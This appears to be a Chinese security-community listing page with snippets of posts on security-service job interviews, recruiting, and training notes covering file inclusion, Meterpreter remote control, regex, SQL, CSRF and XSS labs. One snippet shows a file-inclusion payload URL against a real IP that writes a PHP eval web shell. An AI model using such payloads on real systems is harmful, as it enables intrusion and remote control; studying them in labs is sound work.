北京华顺信安 安全服务面试经验分享
所面试的公司:北京华顺信安(白帽汇)薪资待遇:保密。不过给到满意了,因为是一线城市,也不会牵涉二三线转一线不加薪的忧虑。而且hr和主管都蛮好的,嘿嘿。所在城市:北京面试职位:安全服务工程师面试过程:电话面试。总共经历了三次面试。还有两三次人力资源的沟通。面试官的问题:自我介绍 巴拉巴拉~红蓝队经验 巴拉巴拉~ 红队的话主要就是地市级别的多一些,以抢时间为主,一般都是三个人,一般按照1
简单聊一下没找到工作的小哥哥可以看下
之前面试了很久,后来拿到软通动力和安恒的offer,软通那边流程都走完了,就差入职了,最后选择去了安恒,挺不好意思的。然后说一下,南京软通动力那边有个车联网自动驾驶项目web安全测试,目前急需人,大家感兴趣了可以看下,技术要求的话,其实不高的,用我给的文档完全可以。HR邢奔燕人挺好的,一面二面综面也都蛮简单的。HR也说了薪资可以放宽,感兴趣的可以大胆面。南京安恒这边安服也是缺人的,大家也可以来看看
逸辰面试简分享
面试流程70大大已经说了大部分问题不关技术的都会是自我介绍、离职原因、薪资期望(先反问薪资结构)、入职时间。这些注意好措辞就好了,我就不给我怎么说的了。毕竟离职都没能拔到70大大的腿毛,也没能抱着风哥的大腿,搂着周末的胳膊,然后对思学老师含情脉脉,是我的遗憾。技术面的话,主要就是两种了,渗透测试和安全服务。话不多说,逸辰这孩子,是真的倒霉,我就不吐槽了。安全服务的问题,直接看我附件就行了。渗透
逸辰 10.2、本地包含与远程包含漏洞补
http://117.167.136.245:21880/lfi/phpmyadmin/index.php?target=db_sql.php%253f/../../../../mysql/data/yichen/minyu.frm&a=$a='<?php @eval($_REQUEST[\'a\'])?>';file_put_contents(
一次简单的Meterpreter远程控制测试
一次简单的Meterpreter测试一、 正向控制:1)被控端(被攻击者)执行了控制软件打开远程控制服务端 2)主控端(攻击者)需知道被控端IP反向控制:受害人执行了控制软件被控制之后会主动告诉控制端自己已被控制(即主控方不需要知道对方IP)二、 使用Kali Linux 2作为主控端(192.168.157.128)
逸辰 正则表达式匹配题
正则表达式 常用转义字符:数字:\d非数字:\D空白字符(空格、制表符、换页符等):\s非空白字符:\S制表符:\t回车符:\r换行符:\n单词字符(26个英文字母+数字+下划线_):\w非单词字符:\W /zkaq.*key.{2,9}:\/.*\/(key*key)/i/xx/ 表示双斜杠里面填的是正则表达式I 表示是忽略大小写. 表示匹配除了\n换行符以外的任意的一个字符
逸辰 后端+表单验证作业
login.html<!DOCTYPE html><html><head><title>表单验证</title></head><body><form action="login.php" method="post"/> 账号:<input type
数据库简介及SQL语法 笔记
数据库简介及SQL语法数据库就是将大量数据把保存起来,通过计算机加工而成的可以高效访问的数据集合。常见的数据库: ①Oracle Database:甲骨文公司 ②SQL Server:微软公司 ③DB2:IBM 公司 ④PostgreSQL:开源 ⑤MySQL:开源3 种 SQL 语句种类: (1)DDL(数据定义语言
逸辰 9.4、CSRF跨站伪造请求
9.4、CSRF跨站伪造请求CSRF(Cross-site request forgery)跨站请求伪造:也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相
逸辰 9.1、反射型XSS靶场-9.2、存储型Xss靶场-9.3、DOM XSS靶场
1.XSS主要拼接的是什么? (总结:xss就是拼接恶意的HTML)SQL注入拼接的是操作数据库的SQL语句。XSS拼接的是网页的HTML代码,一般而言我们是可以拼接出合适的HTML代码去执行恶意的JS语句2.xss真的执行恶意代码的实际上是JS语句,那么我们一般需要构建<script></script>